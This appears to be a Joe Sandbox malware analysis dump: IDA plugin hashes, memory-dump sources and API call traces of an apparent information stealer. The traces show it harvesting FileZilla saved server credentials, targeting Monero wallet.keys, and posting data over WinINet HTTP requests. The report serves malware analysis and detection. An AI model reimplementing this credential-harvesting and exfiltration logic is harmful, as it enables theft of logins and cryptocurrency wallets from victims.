                                  • Instruction ID: 011634bc16e6fc5b717470b2e67a857b64d3b02661a11b99752d59f2d3c96cb2
                                  • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                  • Instruction Fuzzy Hash: FB9139319287916AE7168B38CD41BAAB794FFE6350F14D32EF98872491EB7385828345
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                  • Instruction ID: 060a746b14ec32ffed5c8a714be4f52df44a4beeb135d733c377da29cd71d68b
                                  • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                  • Instruction Fuzzy Hash: 12A13F72A04A19CBEB19CF59CCC1A9EBBB1FB54314F14D22AD41AE73A0D334A945CF90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                  • Instruction ID: 0009fa33b11bbfc8ec7b5beb41e5d784701e0b49caf64d3a79154cc630c9ed6c
                                  • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                  • Instruction Fuzzy Hash: DEA17172E083119BD308CF25C89075BF7E2EFC8710F1AC93DA8999B254D7B4E9459B82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 11d831b8339698192456e6e74c53fbc82f424317e8ce45417f87d8eabb7d9b8a
                                  • Instruction ID: d7ca6e4bd29c17bb06c0f49536021230e4db1664150a964ced4726338ad007cd
                                  • Opcode Fuzzy Hash: 11d831b8339698192456e6e74c53fbc82f424317e8ce45417f87d8eabb7d9b8a
                                  • Instruction Fuzzy Hash: 4A514BF260C624DFD714BE29D88577EBBE9EB54328F16482DD6C6C7A00E2359880CB57
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction ID: 28c435171d94522aab6a8463c4e6cdc68f7808834f016374556056740f06fdca
                                  • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction Fuzzy Hash: 9C515D62E09BD989C7058B7544502EEBFB25FE6204F1E839EC4982F383C335568AD3E5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14c01da5d5ce44614083870d123e0ee766e1c437674121ccee0120492a1294f6
                                  • Instruction ID: 2408e322aa1adfb0e3581be0dc9d62b7518e9e4eba43e2a6c8c20a5c4fb39401
                                  • Opcode Fuzzy Hash: 14c01da5d5ce44614083870d123e0ee766e1c437674121ccee0120492a1294f6
                                  • Instruction Fuzzy Hash: EF2162B250C300AFE315AE59DCC17ABF7E9FB58320F16492DEBD543750D63568008A97
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                  • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                  • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                  • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E78F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E78F9B
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E6A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E6A13C
                                    • Part of subcall function 00E6A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E6A161
                                    • Part of subcall function 00E6A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E6A181
                                    • Part of subcall function 00E6A110: ReadFile.KERNEL32(000000FF,?,00000000,00E6148F,00000000), ref: 00E6A1AA
                                    • Part of subcall function 00E6A110: LocalFree.KERNEL32(00E6148F), ref: 00E6A1E0
                                    • Part of subcall function 00E6A110: CloseHandle.KERNEL32(000000FF), ref: 00E6A1EA
                                    • Part of subcall function 00E78FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E78FE2
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00E80DBF,00E80DBE,00E80DBB,00E80DBA), ref: 00E704C2
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E704C9
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00E704E5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E704F3
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00E7052F
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E7053D
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00E70579
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E70587
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E705C3
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E705D5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E70662
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E7067A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E70692
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E706AA
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00E706C2
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00E706D1
                                  • lstrcat.KERNEL32(?,url: ), ref: 00E706E0
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E706F3
                                  • lstrcat.KERNEL32(?,00E81770), ref: 00E70702
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E70715
                                  • lstrcat.KERNEL32(?,00E81774), ref: 00E70724
                                  • lstrcat.KERNEL32(?,login: ), ref: 00E70733
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E70746
                                  • lstrcat.KERNEL32(?,00E81780), ref: 00E70755
                                  • lstrcat.KERNEL32(?,password: ), ref: 00E70764
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E70777
                                  • lstrcat.KERNEL32(?,00E81790), ref: 00E70786
                                  • lstrcat.KERNEL32(?,00E81794), ref: 00E70795
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E707EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: 9586f2f0847b0613192b6adc4962e6d9ee0ae5d6b0f884d2d35e561910adb142
                                  • Instruction ID: 1df2983e5bd4fd307e1f487c0e1cfda0d2b1fdff60f62663f21afb7d0e2a6121
                                  • Opcode Fuzzy Hash: 9586f2f0847b0613192b6adc4962e6d9ee0ae5d6b0f884d2d35e561910adb142
                                  • Instruction Fuzzy Hash: F3D13172900208ABCB18FBF0DD56EEE77BDAF54300F149568F11A76095EF31AA45CB61
                                  APIs
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E64800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E64889
                                    • Part of subcall function 00E64800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E64899
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E65A48
                                  • StrCmpCA.SHLWAPI(?,0173E308), ref: 00E65A63
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E65BE3
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0173E298,00000000,?,0173A0A0,00000000,?,00E81B4C), ref: 00E65EC1
                                  • lstrlen.KERNEL32(00000000), ref: 00E65ED2
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00E65EE3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E65EEA
                                  • lstrlen.KERNEL32(00000000), ref: 00E65EFF
                                  • lstrlen.KERNEL32(00000000), ref: 00E65F28
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E65F41
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00E65F6B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E65F7F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00E65F9C
                                  • InternetCloseHandle.WININET(00000000), ref: 00E66000
                                  • InternetCloseHandle.WININET(00000000), ref: 00E6600D
                                  • HttpOpenRequestA.WININET(00000000,0173E348,?,0173DAB0,00000000,00000000,00400100,00000000), ref: 00E65C48
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                  • InternetCloseHandle.WININET(00000000), ref: 00E66017
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: 5d32a74f9d69dfb11521923b16cd1da570a45cebbd5d701f4421550bc20f0af8
                                  • Instruction ID: dfbdf503edd63aa26ccf8d5e403ce39ba8bd83aaf80338a8953bca00b9275526
                                  • Opcode Fuzzy Hash: 5d32a74f9d69dfb11521923b16cd1da570a45cebbd5d701f4421550bc20f0af8
                                  • Instruction Fuzzy Hash: 4112EF72920118ABCB15EBA0DCA5FEEB3B9BF54700F1491A9F10E72091EF706A48CF55
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E78CF0: GetSystemTime.KERNEL32(00E80E1B,0173A010,00E805B6,?,?,00E613F9,?,0000001A,00E80E1B,00000000,?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E78D16
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E6D083
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E6D1C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E6D1CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E6D308
                                  • lstrcat.KERNEL32(?,00E81570), ref: 00E6D317
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E6D32A
                                  • lstrcat.KERNEL32(?,00E81574), ref: 00E6D339
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E6D34C
                                  • lstrcat.KERNEL32(?,00E81578), ref: 00E6D35B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E6D36E
                                  • lstrcat.KERNEL32(?,00E8157C), ref: 00E6D37D
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E6D390
                                  • lstrcat.KERNEL32(?,00E81580), ref: 00E6D39F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E6D3B2
                                  • lstrcat.KERNEL32(?,00E81584), ref: 00E6D3C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E6D3D4
                                  • lstrcat.KERNEL32(?,00E81588), ref: 00E6D3E3
                                    • Part of subcall function 00E7AB30: lstrlen.KERNEL32(UO,?,?,00E64F55,00E80DDF), ref: 00E7AB3B
                                    • Part of subcall function 00E7AB30: lstrcpy.KERNEL32(00E80DDF,00000000), ref: 00E7AB95
                                  • lstrlen.KERNEL32(?), ref: 00E6D42A
                                  • lstrlen.KERNEL32(?), ref: 00E6D439
                                    • Part of subcall function 00E7AD80: StrCmpCA.SHLWAPI(00000000,00E81568,00E6D2A2,00E81568,00000000), ref: 00E7AD9F
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E6D4B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: c6dce136c555c5676d9e8952d70ce06603ed6836c7476cda682768461a6d0f7d
                                  • Instruction ID: 854f6df4011a6bfc4c08e41950b19c90cdfdbb725b28f219642cd238f6c8c9d6
                                  • Opcode Fuzzy Hash: c6dce136c555c5676d9e8952d70ce06603ed6836c7476cda682768461a6d0f7d
                                  • Instruction Fuzzy Hash: 7BE13271910108ABCB18FBA0DD96EEEB3BDAF94301F149574F11A76095DF31AE48CB62
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0173C9C8,00000000,?,00E81544,00000000,?,?), ref: 00E6CB6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00E6CB89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00E6CB95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E6CBA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00E6CBD9
                                  • StrStrA.SHLWAPI(?,0173C7E8,00E80B56), ref: 00E6CBF7
                                  • StrStrA.SHLWAPI(00000000,0173C8D8), ref: 00E6CC1E
                                  • StrStrA.SHLWAPI(?,0173D560,00000000,?,00E81550,00000000,?,00000000,00000000,?,01738838,00000000,?,00E8154C,00000000,?), ref: 00E6CDA2
                                  • StrStrA.SHLWAPI(00000000,0173D580), ref: 00E6CDB9
                                    • Part of subcall function 00E6C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E6C971
